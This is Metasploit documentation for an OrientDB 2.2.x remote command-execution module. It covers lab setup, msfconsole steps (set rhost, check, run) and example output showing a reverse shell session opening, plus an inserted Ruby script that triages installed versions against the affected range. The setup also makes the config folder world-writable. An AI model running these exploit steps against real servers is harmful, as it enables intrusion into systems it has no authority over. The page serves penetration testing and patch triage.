metasploit-gs/documentation/modules/exploit/multi/http/orientdb_exec.md
2017-07-20 09:03:26 +01:00


This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.

All versions from 2.2.1 up to 2.2.22 should be vulnerable.

The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318

Vulnerable Application

OrientDB 2.2.1 through 2.2.22
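For patch triage, the affected range stated above can be checked against an inventory of installed versions. This is an added example, not part of the module or its documentation; the host names and inventory entries are constructed, and the function names are hypothetical.

```ruby
require 'rubygems' # Gem::Version compares version segments numerically

# Affected range as stated on this page: 2.2.1 through 2.2.22 inclusive.
FIRST_AFFECTED = Gem::Version.new('2.2.1')
LAST_AFFECTED  = Gem::Version.new('2.2.22')

# Pull a dotted version out of free text such as an inventory entry or a
# package file name. Returns nil when nothing version-like is present.
def extract_version(text)
  m = text.to_s.match(/(\d+\.\d+\.\d+)/)
  m && Gem::Version.new(m[1])
end

# Returns :in_range, :out_of_range or :unknown for one inventory entry.
# A plain string comparison would misplace 2.2.3 ("2.2.3" sorts after
# "2.2.22"), so the comparison is done on Gem::Version objects.
def classify(text)
  v = extract_version(text)
  return :unknown if v.nil?
  v.between?(FIRST_AFFECTED, LAST_AFFECTED) ? :in_range : :out_of_range
end

# Constructed sample inventory (host name => recorded package string).
SAMPLE_INVENTORY = {
  'db-lab-01' => 'orientdb-community-2.2.20.zip',
  'db-lab-02' => 'orientdb-community-2.2.3',
  'db-lab-03' => 'orientdb-community-2.2.23',
  'db-lab-04' => 'orientdb-community-2.2.0',
  'db-lab-05' => 'orientdb-community-2.1.25',
  'db-lab-06' => 'version not recorded'
}.freeze

# Map every host to its verdict.
def triage(inventory)
  inventory.transform_values { |entry| classify(entry) }
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_INVENTORY).each do |host, verdict|
    puts format('%-10s %s', host, verdict)
  end
end
```

Entries reported as `:unknown` need a manual version check before they can be ruled out.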

Installation

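Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/

    # Quote the URL so the shell does not treat "&" as a background operator,
    # and name the output file so unzip finds it.
    $ wget -O orientdb-community-2.2.20.zip 'http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi'
    $ unzip orientdb-community-2.2.20.zip
    $ cd orientdb-community-2.2.20
    $ chmod 755 bin/*.sh
    $ chmod -R 777 config
    $ cd bin
    $ ./server.sh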

References for running OrientDB

  • http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
  • http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html

References for vulnerability

  • https://blogs.securiteam.com/index.php/archives/3318
  • http://www.palada.net/index.php/2017/07/13/news-2112/
  • https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017

Verification Steps

  • Start msfconsole
  • use exploit/multi/http/orientdb_exec
  • set rhost <RHOST>
  • set target <TARGET_NUMBER>
  • set workspace <WORKSPACE>
  • check
  • Verify if the OrientDB instance is vulnerable
  • run
  • Verify you get a session

Example Output

    [LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run
    [*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331
    [*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...
    [*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100